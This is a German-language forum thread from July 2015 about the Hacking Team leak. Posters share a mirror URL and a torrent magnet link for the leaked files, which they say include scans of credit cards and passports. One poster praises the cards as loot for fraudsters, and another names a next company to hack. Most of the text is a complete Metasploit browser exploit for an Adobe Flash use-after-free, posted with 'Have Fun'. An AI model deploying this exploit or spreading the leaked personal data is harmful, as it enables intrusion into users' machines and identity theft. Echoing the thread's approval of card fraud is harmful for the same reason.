trisn (13.07.2015)
https://ht.transparencytoolkit.org/ soll der Inhalt des Torrents sein. Inwiefern das stimmt kann ich nicht beurteilen, da ich mir das ganze noch nicht genauer angeschaut habe.
Die Leute von HackedTeam haben vollstaendige Scans / Fotos von Kreditkarten und Paessen auf Ihrem Fileserver gehabt. Also ja, es sind auch Kreditkartendaten dabei - aber wenn das ernsthaft das interessanteste Datenmaterial dieses Leaks sein soll dann weiss ich auch nicht mehr weiter. Flash 0-Day ist bereits raus, und da kommt sicher noch mehr.Wo hast du das denn her? Ich lese nur "internal Data" und "interne Mails und Sourcecodes".
Der Mirror wird an vielen verschiedenen Stellen erwaehnt, ich hab' gestern kurz druebergesehen - scheint soweit vollstaendig zu sein.https://ht.transparencytoolkit.org/ soll der Inhalt des Torrents sein. Inwiefern das stimmt kann ich nicht beurteilen, da ich mir das ganze noch nicht genauer angeschaut habe.
Fuer diejenigen die den Torrent nicht oeffnen koennen (transmission-gtk und rtorrent koennen das):
Mit dem Magnet-Link geht es besser.Code:magnet:?xt=urn:btih:51603bff88e0a1b3bad3962614978929c9d26955&dn=Hacked%20Team&tr=udp%3A%2F%2Fcoppersurfer.tk%3A6969%2Fannounce&tr=udp%3A%2F%2F9.rarbg.me%3A2710%2Fannounce&tr=http%3A%2F%2Fmgtracker.org%3A2710%2Fannounce&tr=http%3A%2F%2Fbt.careland.com.cn%3A6969%2Fannounce&tr=udp%3A%2F%2Fopen.demonii.com%3A1337&tr=udp%3A%2F%2Fexodus.desync.com%3A6969&tr=udp%3A%2F%2Ftracker.leechers-paradise.org%3A6969&tr=udp%3A%2F%2Ftracker.pomf.se&tr=udp%3A%2F%2Ftracker.blackunicorn.xyz%3A6969
ich meinte auch die ccs sind für fraudler super , diesmal klausen sie von den richtigen das geld und ich hoffe sie klauen viel , sehr viel....
btw das 0.day wurde dort doch nur erwähnt , ich sah jetzt nirgendwo irgendwas von lücken scr , ist aber ach ein sehr großer haufen scheizzze
edit sehr geil
https://ht.transparencytoolkit.org/c...esktop/you.txt hrhrh
Geändert von jarbukk (08.07.2015 um 09:57 Uhr)
trisn (13.07.2015)
Nein, der 0-Day ist Fakt. Adobe hat heute einen Notfallpatch rausgehauen. Microsoft hat auch was gefunden. Google ist gerade am Pruefen eines potentiellen Sandbox-Escapes fuer Chrome. Und irgendwas mit UEFI war da auch noch.btw das 0.day wurde dort doch nur erwähnt , ich sah jetzt nirgendwo irgendwas von lücken scr , ist aber ach ein sehr großer haufen scheizzze
die müssen dann ja zer0-days im wert von 2-3 mill euro gehabt haben , jetzt wisst ihr auch warum sie hacked wurden und fragt euch mal , ob die hacker diese villeicht weiterverkauft haben , ein paar tage big buzii , dann public machen und zack 0 euro mehr wert die exploits , hätte ich genauso gemacht. next target vupen.com
Hier der Exploit - FYI### This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::BrowserExploitServer
def initialize(info={})
super(update_info(info,
'Name' => 'Adobe Flash Player ByteArray Use After Free',
'Description' => %q{
This module exploits an use after free on Adobe Flash Player. The vulnerability,
discovered by Hacking Team and made public on its July 2015 data leak, was
described as an Use After Free while handling ByteArray objects. This module has
been tested successfully on:
Windows XP, Chrome 43 and Adobe Flash 18.0.0.194,
Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.194,
Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194,
Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194,
Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.468.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Unknown', # Someone from HackingTeam
'juan vazquez' # msf module
],
'References' =>
[
['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/unpatched-flash-player-flaws-more-pocs-found-in-hacking-team-leak/'],
['URL', 'https://twitter.com/w3bd3vil/status/618168863708962816']
],
'Payload' =>
{
'DisableNops' => true
},
'Platform' => ['win', 'linux'],
'Arch' => [ARCH_X86],
'BrowserRequirements' =>
{
:source => /script|headers/i,
:arch => ARCH_X86,
:os_name => lambda do |os|
os =~ OperatingSystems::Match::LINUX ||
os =~ OperatingSystems::Match::WINDOWS_7 ||
os =~ OperatingSystems::Match::WINDOWS_81 ||
os =~ OperatingSystems::Match::WINDOWS_VISTA ||
os =~ OperatingSystems::Match::WINDOWS_XP
end,
:ua_name => lambda do |ua|
case target.name
when 'Windows'
return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF || ua == Msf::HttpClients::CHROME
when 'Linux'
return true if ua == Msf::HttpClients::FF
end
false
end,
:flash => lambda do |ver|
case target.name
when 'Windows'
# Note: Chrome might be vague about the version.
# Instead of 18.0.0.203, it just says 18.0
return true if ver =~ /^18\./ && Gem::Version.new(ver) <= Gem::Version.new('18.0.0.194')
when 'Linux'
return true if ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.468')
end
false
end
},
'Targets' =>
[
[ 'Windows',
{
'Platform' => 'win'
}
],
[ 'Linux',
{
'Platform' => 'linux'
}
]
],
'Privileged' => false,
'DisclosureDate' => 'Jul 06 2015',
'DefaultTarget' => 0))
end
def exploit
@swf = create_swf
super
end
def on_request_exploit(cli, request, target_info)
print_status("Request: #{request.uri}")
if request.uri =~ /\.swf$/
print_status('Sending SWF...')
send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
return
end
print_status('Sending HTML...')
send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
end
def exploit_template(cli, target_info)
swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
target_payload = get_payload(cli, target_info)
b64_payload = Rex::Text.encode_base64(target_payload)
os_name = target_info[:os_name]
if target.name =~ /Windows/
platform_id = 'win'
elsif target.name =~ /Linux/
platform_id = 'linux'
end
html_template = %Q|<html>
<body>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
<param name="movie" value="<%=swf_random%>" />
<param name="allowScriptAccess" value="always" />
<param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os= <%=os_name%>" />
<param name="Play" value="true" />
<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%> &os=<%=os_name%>" Play="true"/>
</object>
</body>
</html>
|
return html_template, binding()
end
def create_swf
path = ::File.join(Msf::Config.data_directory, 'exploits', 'hacking_team', 'msf.swf')
swf = ::File.open(path, 'rb') { |f| swf = f.read }
swf
end
end
Have Fun
______________________________________
Seitdem ich perfekt bin, hält sich meine Arroganz in Grenzen.
Interessant das Herr Pozzi selbst seinen Whatsapp Verkehr als Backup drinne hat.
__ __
\/----\/"---|_|--|_|---"
\0 0/
_\ /_
_| \/ |_
| | | | | |
_| | | | | |_
määäähh.